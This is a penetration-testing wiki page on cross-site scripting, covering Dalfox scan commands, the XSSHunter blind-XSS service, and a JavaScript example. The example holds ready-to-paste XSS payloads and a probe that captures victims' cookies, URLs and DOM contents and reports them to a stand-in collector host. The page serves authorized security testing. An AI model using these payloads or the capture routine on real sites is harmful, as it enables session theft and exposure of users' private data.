Pentest List Wiki
Cross-Site Scripting

How to exploit cross-site scripting (XSS).

Standard XSS

Dalfox

Dalfox is an open-source XSS scanner written in Go, focused on automation. It takes a URL or a raw HTTP request, discovers parameters, checks where input is reflected, and then tries context-aware payloads against the reflection points.

  • https://github.com/hahwul/dalfox

The following command reads a raw HTTP request (as copied from Burp Suite or ZAP, request line and headers included) from a file named HTTPREQUEST and looks for XSS in it. Add the -b flag with your blind XSS probe URL to also inject blind payloads.

dalfox file --rawdata HTTPREQUEST -b <blind_xss_link>

The following command takes a single URL (with its query parameters) and looks for XSS in the same way, again injecting blind payloads if -b is given. Dalfox cannot confirm a blind hit itself: the -b flag only plants the probe URL, so check your XSS Hunter dashboard after the scan, and keep checking for a while, since a blind payload often fires hours or days later when a staff member opens the page it landed on.

dalfox url URL -b <blind_xss_link>

Blind XSS

XSSHunter

XSSHunter provides a probe URL to embed in XSS payloads for testing blind XSS. When an injected payload executes in a browser you cannot observe (an admin panel, a log viewer, a support queue), the probe loads, captures the page URL, referrer, user agent, non-HttpOnly cookies, a DOM snapshot and a screenshot, and reports them back to your dashboard. The easiest way to use XSSHunter is Truffle Security's hosted platform.

  • https://xsshunter.trufflesecurity.com/app/#/

A hosted collector receives whatever the probe captures from the victim's browser, including session cookies and page content that may belong to the client, so check that the engagement's rules allow sending that data to a third party. If they do not, or if you are otherwise security and privacy conscious, set up a private instance:

  • https://github.com/trufflesecurity/xsshunter
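To make the blind XSS mechanism behind both the Dalfox -b flag and XSSHunter concrete, here is an added example (not code from this page, from Dalfox or from XSS Hunter) showing the three pieces involved: the payload variants that wrap a probe URL for the injection contexts you cannot see, the context the probe gathers once it runs in the victim's browser, and the collector-side triage that turns the report into something actionable. The probe and collector URLs, the stand-in window object and the cookie values are all constructed assumptions; the transport is injected so the whole exchange runs offline under Node.

```javascript
// Added example: blind XSS probe, payloads and collector triage. Not from the
// page, Dalfox or XSS Hunter. PROBE_URL and COLLECTOR_URL are hypothetical;
// in practice your XSS Hunter instance gives you the real ones.
const PROBE_URL = "https://xss.example.test/probe.js";
const COLLECTOR_URL = "https://xss.example.test/report";

// Payloads that wrap the probe URL for the contexts you cannot see when the
// sink is blind. Each breaks out of one context, then loads the probe.
function blindPayloads(probeUrl = PROBE_URL) {
  const tag = `<script src="${probeUrl}"></script>`;
  const loader = `var s=document.createElement('script');s.src='${probeUrl}';document.head.appendChild(s)`;
  return {
    html: tag,                                   // raw HTML context
    attrDouble: `">${tag}`,                      // inside a "..." attribute
    attrSingle: `'>${tag}`,                      // inside a '...' attribute
    imgOnerror: `"><img src=x onerror="${loader}">`, // when <script> is filtered
    jsString: `';${loader};//`,                  // inside a JS string literal
  };
}

// What the probe does once it executes in the victim's browser. `win` is
// passed in so the function can be exercised with a constructed window below.
function collectContext(win) {
  const d = win.document;
  return {
    firedAt: new Date().toISOString(),
    url: win.location.href,
    origin: win.location.origin,
    referrer: d.referrer,
    cookies: d.cookie,                 // HttpOnly cookies never show up here
    userAgent: win.navigator.userAgent,
    title: d.title,
    dom: d.documentElement.outerHTML.slice(0, 256 * 1024), // cap report size
  };
}

// Ship the report. In a browser `transport` would be fetch() or
// navigator.sendBeacon(); it is injected here so no network is needed.
function sendReport(ctx, collectorUrl, transport) {
  return transport(collectorUrl, JSON.stringify(ctx));
}

// Collector side. The report comes from a browser you do not control, so
// treat every field as attacker-influenced: bound the size, require the
// expected shape, and never render `dom` as HTML in the dashboard.
function triage(rawBody) {
  if (rawBody.length > 1024 * 1024) throw new Error("report too large");
  let r;
  try { r = JSON.parse(rawBody); } catch { throw new Error("malformed report"); }
  for (const k of ["url", "origin", "cookies", "userAgent", "dom"]) {
    if (typeof r[k] !== "string") throw new Error(`missing field: ${k}`);
  }
  const u = new URL(r.url);                      // throws on garbage URLs
  const cookieNames = r.cookies
    ? r.cookies.split(";").map((c) => c.trim().split("=")[0])
    : [];
  return {
    origin: u.origin,
    path: u.pathname,
    cookieNames,
    hasSession: cookieNames.some((n) => /sess|token|auth/i.test(n)),
    summary: `blind XSS fired at ${u.origin}${u.pathname} ` +
      `(${cookieNames.length} readable cookies, UA: ${r.userAgent})`,
  };
}

// Constructed stand-in for the page the probe landed on: an internal admin
// panel that rendered a user-supplied field without encoding it.
const fakeWindow = {
  location: { href: "https://admin.example.test/tickets/42?view=full",
              origin: "https://admin.example.test" },
  navigator: { userAgent: "Mozilla/5.0 (X11; Linux x86_64) Firefox/120.0" },
  document: {
    referrer: "https://admin.example.test/tickets",
    cookie: "sessionid=abc123; theme=dark",      // constructed values
    title: "Ticket #42",
    documentElement: { outerHTML: "<html><body><h1>Ticket #42</h1></body></html>" },
  },
};

// Run the full exchange offline: probe fires, report is sent, collector triages.
function demo() {
  const inbox = [];                              // what the collector received
  const fakeTransport = (url, body) => { inbox.push({ url, body }); return true; };
  sendReport(collectContext(fakeWindow), COLLECTOR_URL, fakeTransport);
  return inbox.map((m) => triage(m.body));
}

console.log(blindPayloads());
console.log(demo());
```

The payload set is what you would paste into every blind sink you can find (names, free-text fields, User-Agent and Referer headers), since you do not know which context the stored value ends up in. The triage function deliberately rejects anything that is not the shape the probe produces: a collector that trusts its own reports is an easy target, and the dashboard that renders them is itself a web application that must encode the captured DOM rather than display it.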

Last updated 1 year ago